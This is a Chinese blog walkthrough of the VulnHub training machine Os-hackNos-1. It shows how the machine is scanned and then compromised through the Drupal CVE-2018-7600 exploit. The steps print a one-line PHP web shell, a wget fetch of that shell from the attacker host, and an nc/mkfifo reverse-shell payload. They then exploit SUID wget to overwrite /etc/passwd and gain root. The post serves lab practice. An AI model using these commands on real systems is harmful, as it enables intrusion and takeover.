vulnhub靶机练习-Os-hackNos-1

已于 2022-11-25 21:13:25 修改
阅读量660 收藏 1
点赞数
分类专栏: 靶机测试 文章标签: 网络 web安全
于 2022-11-25 21:09:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyj1781572/article/details/128036410
版权

今天带来的靶机是 vulnhub Os-hackNos-1 先看一下简介:   

难度容易到中 flag 两个 一个是普通用户的user.txt 另外一个是root用户的user.txt

0.靶机简介:

Difficulty : Easy to Intermediate

Flag : 2 Flag first user And second root

Learning : exploit | Web Application | Enumeration | Privilege Escalation

Website : www.hackNos.com

mail : contact@hackNos.com

靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

1.收集信息

1.1使用nmap对目标进行扫描

root@kali:~# nmap -p- 192.168.0.142 -sV -oA Os-hackNos-1

Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-07 18:51 AKST

Nmap scan report for 192.168.0.142

Host is up (0.011s latency).

Not shown: 65533 closed ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

MAC Address: 40:A5:EF:46:69:0A (Shenzhen Four Seas Global Link Network Technology)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 15.66 seconds

1.2 gobuster对目标80端口进行目录扫描

root@kali:~# gobuster dir -u http://192.168.0.142 -w /usr/share/wordlists/dirbuster/directory-

list-2.3-small.txt 

===============================================================Gobuster v3.0.1

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)

===============================================================[+] Url:            http://192.168.0.142

[+] Threads:        10

[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

[+] Status codes:   200,204,301,302,307,401,403

[+] User Agent:     gobuster/3.0.1

[+] Timeout:        10s

===============================================================2019/12/07 18:49:29 Starting gobuster

===============================================================/drupal (Status: 301)

===============================================================2019/12/07 18:50:14 Finished

通过目录扫描发现目标装有drupal 访问目录如图

通过 http://192.168.0.142/drupal/CHANGELOG.txt  得知grupal的版本为 Drupal 7.57

3.对Drupal 7.57进行安全检测

通过一些列技术手段在Drupal 进行安全测试 最终在gitbub

https://github.com/pimps/CVE-2018-7600 找到exp            

3.1 查看配置文件收集信息

python3 drupa7-CVE-2018-7600.py http://192.168.0.142/drupal/ -c "cat sites/default/settings.php"

1.$databases = array (

2 'default' =>

3 array (

4 'default' =>

5 array (

6 'database' => 'cuppa',

7 'username' => 'cuppauser',

8 'password' => 'Akrn@4514',

9 'host' => 'localhost',

10 'port' => '',

11 'driver' => 'mysql',

12 'prefix' => '',

13 ),

14 ),

15);

4.反弹shell

4.1通过exp下载 shell文件 

python3 drupa7-CVE-2018-7600.py http://192.168.0.142/drupal/ -c "wget 192.168.0.136:8000/mOon.php mOon.php"

mOon内容是

php system($_POST['moon']);?>

4.2 使用burpsuite进行POST提交

通过命令查找nc 是否存在 which nc 存在的情况下 用nc反弹 

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+‐i+2>%261|nc+192.168.0.136+9001+>/tmp/f

kali上 执行命令 nc -lvnp 9001

4.3 得到shell

 切换python3 shell

python3 ‐c 'import pty;pty.spawn("/bin/bash")'   

5.解密文件

5.1 在网站根目录找到可疑文件 alexander.txt

base64解密

1echo "KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==" | base64 ‐d

得到文件

1+++++ +++++ [‐>++ +++++ +++] >++++ ++.‐‐ ‐‐‐‐‐ ‐‐. ++[‐> +++] >+++.

2.‐‐‐‐‐ ‐‐‐. +++[‐ >+++ ]>+++ ++. +++++ +[‐>‐ ‐‐‐‐‐ ‐]>‐ ‐‐‐‐‐ ‐‐.

3++[‐> +++] >++++ +. +++[‐ >++++ +]>. ++.++ +++++ +.‐‐‐ ‐‐‐. +++[‐

4>+++ ]>+++ +. +++++ [‐>‐‐ ‐‐‐‐‐ ]>‐. [ ‐>‐‐‐ ]>‐‐ ‐.+.‐ ‐‐‐.+

在线解密 https://www.splitbrain.org/services/ook

 最后得到账号和密码 james:Hacker@451

6.查找user.txt 

6.1  用户登录失败 

再进行su操作的时候发现用户 su james登录失败

ssh登录发现用户登录不允许登陆

6.2  得到user.txt flag

cat /etc/passwd 

ls /cat/james

cat /etc/james/user.txt

7.特权提升

7.1 通过suid提权 查找特权文件命令

     find / ‐perm ‐u=s ‐type f 2>/dev/null  

  

从上图可以看到 wget 是拥有root权限 即可以通过wget 下载可以替换文件。   

7.2 替换/etc/passwd      

在kali上生成密码     

openssl passwd ‐1 ‐salt moonsec 123456       

创建文件passwd 把 写入moonsec 为root权限     

1.cat /etc/passwd   

2.root:x:0:0:root:/root:/bin/bash  

3.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

4.bin:x:2:2:bin:/bin:/usr/sbin/nologin

5.sys:x:3:3:sys:/dev:/usr/sbin/nologin

6.sync:x:4:65534:sync:/bin:/bin/sync

7.games:x:5:60:games:/usr/games:/usr/sbin/nologin

8.man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

9.lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

10.mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

11.news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

12.uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

13.proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

14.www‐data:x:33:33:www‐data:/var/www:/usr/sbin/nologin

15.backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

16.list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

17.irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

18.gnats:x:41:41:Gnats Bug‐Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

19.nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

20.systemd‐timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false

21.systemd‐network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false

22.systemd‐resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false

23.systemd‐bus‐proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false

24.syslog:x:104:108::/home/syslog:/bin/false

25_apt:x:105:65534::/nonexistent:/bin/false

26.lxd:x:106:65534::/var/lib/lxd/:/bin/false

27messagebus:x:107:111::/var/run/dbus:/bin/false

28uuidd:x:108:112::/run/uuidd:/bin/false

29dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false

30james:x:1000:1000:james,,,:/home/james:/bin/bash

31sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin

32mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false

33moonsec:$1$moonsec$Zo8rbBypEa7Gt6vL8qy841:0:0:root:/root:/bin/bash

7.3 替换文件

  wget http://192.168.0.136:8000/passwd ‐O /etc/passwd

  查看目标上的/etc/passwd 看到文件已经成功替换 

7.4 获取root.txt                  

su moonsec 输入密码获取root权限               

jack-yyj
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机练习笔记-Os-hackNos-1
2301_80115097的博客
04-10 828
现在提权的思路就是先下载靶机上的passwd,然后添加一个有root权限的用户到构造的passwd文件中,然后使用wget -O把构造的passwd内容重定向输入到原本的/etc/passwd中。dirb也扫一边,貌似dirb扫到的结果比dirsearch多,所以在实战的时候可以用多个不同的工具进行信息收集,这样才更全面。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。访问drupal目录,是一个登录界面,弱口令登录测试无果,换换别的思路。
靶机hackNos Os-Bytesec练习报告
黑战士的博客
05-21 1008
1. 之前只接触过windows下的smb漏洞,首次了linux下的smb的扫描和利用方式\2. 学习了suid的linux提权工具,多角度考虑提权方式,不要死磕一种方式。
vulhub - Os-hackNos-1
在下小黄的博客
09-09 522
一、环境搭建:Os-hackNos-1靶机 实验主机:kali linux 2021 虚拟机(VM) 实验靶机Os-hackNos-1靶机(VM) 实验网络:NAT模式 实验难度:简单 flag:1.普通用户的user.txt;2.root用户的user.txt 技能:漏洞利用 | web应用 | 暴力破解 | 权限提升 二、信息收集: 主机发现: 确认自己的信息: ifconfig 探测网段存活主机: nmap -sP 192.168.138.0/24 端口扫描: 探测操作系统及软
No.49-VulnHub-hackNos: Os-hackNos-2.1-Walkthrough渗透学习
qq_34801745的博客
02-09 729
** VulnHub-hackNos: Os-hackNos-2.1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ 靶机难度:容易+中级(CTF) 靶机发布日期:2019年11月29日 靶机描述: Difficulty : Easy to Intermediate Flag : 2 Flag fi...
No.48-VulnHub-hackNos: Os-hackNos-Walkthrough渗透学习
qq_34801745的博客
02-08 660
** VulnHub-hackNos: Os-hackNos-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ 靶机难度:中级(CTF)–本人做完觉得是初级!! 靶机发布日期:2019年11月27日 靶机描述: Difficulty : Easy to Intermediate Flag : 2 Fl...
No.50-VulnHub-hackNos: Os-hackNos-3-Walkthrough渗透学习
qq_34801745的博客
02-09 728
** VulnHub-hackNos: Os-hackNos-3-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 靶机难度:容易+中级(CTF) 靶机发布日期:2019年12月14日 靶机描述: Difficulty: Intermediate Flag: 2 Flag first user A...
Os-hackNos
weixin_44770698的博客
07-04 717
靶场练习-64
No.51-HackTheBox-windows-legacy-Walkthrough渗透学习
qq_34801745的博客
02-11 877
** VulnHub-hackNos: Os-hackNos-3-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines 靶机难度:容易(2.4/10) 靶机发布日期:2017年10月10日 靶机描述: Prepared By: Alexander Reid (Arrexel) Machine Author: ch4p Classif...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
未知攻焉知防:从攻击者视角看网络安全的“攻守之道”
科技云报道
08-01 409
基于独特的“动态安全+AI”技术思想,瑞数信息综合运用自动化攻击保护、0day防护、多源低频防护、多维度分层分级对抗等多种安全防护策略和手段,还推出瑞数WAAP超融合平台,支持WAF、Bots防护、0day攻击防护、应用DDoS防护、API安全防护等多项安全产品单独或联合部署,能够覆盖Web、移动App、H5、API及IoT全应用渠道,提供多层级的联动防御机制,令企业在各类复杂的环境中,都可以轻松实现应用安全一体化防御。其次,由于供应链数量众多,类型错综复杂,导致安全难以做到统一管理,供应链风险与日俱增。
网安科班精选!爱荷华大学教授的网络安全零基础入门教程!
互联网架构小马的博客
07-31 638
网络就像一把双刃剑,给我们的生活、交流、工作和发展带来了便利,但同时也给信息安全以及个人隐私带来了威胁。网络和信息安全问题不仅影响了网络的普及和应用,还关系到企国家、军队、企业的信息安全和社会的经济安全,让人又爱又恨。今天给大家分享的这份手册,主要从网络漏洞、协议和安全解决方案等方面来探讨网络安全问题。我们把网络看成是不安全安全的源头,通过分析网络漏洞、探测、攻击和减少攻击的方法,来研究不同的网络协议。
Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
最新发布
Lusen的博客
08-02 574
Vulnhub系列Connect-The-Dots靶场做题记录
计算机网络—电路、分组、报文交换—图文详解
喻师傅的学习笔记
07-31 833
计算机网络—三种交换方式图文详解
Springboot+Websocket+Security+Vue 实现弹幕推送功能
Gemini1995的博客
08-01 641
【代码】Springboot+Websocket+Security+Vue 实现弹幕推送功能。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jack-yyj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值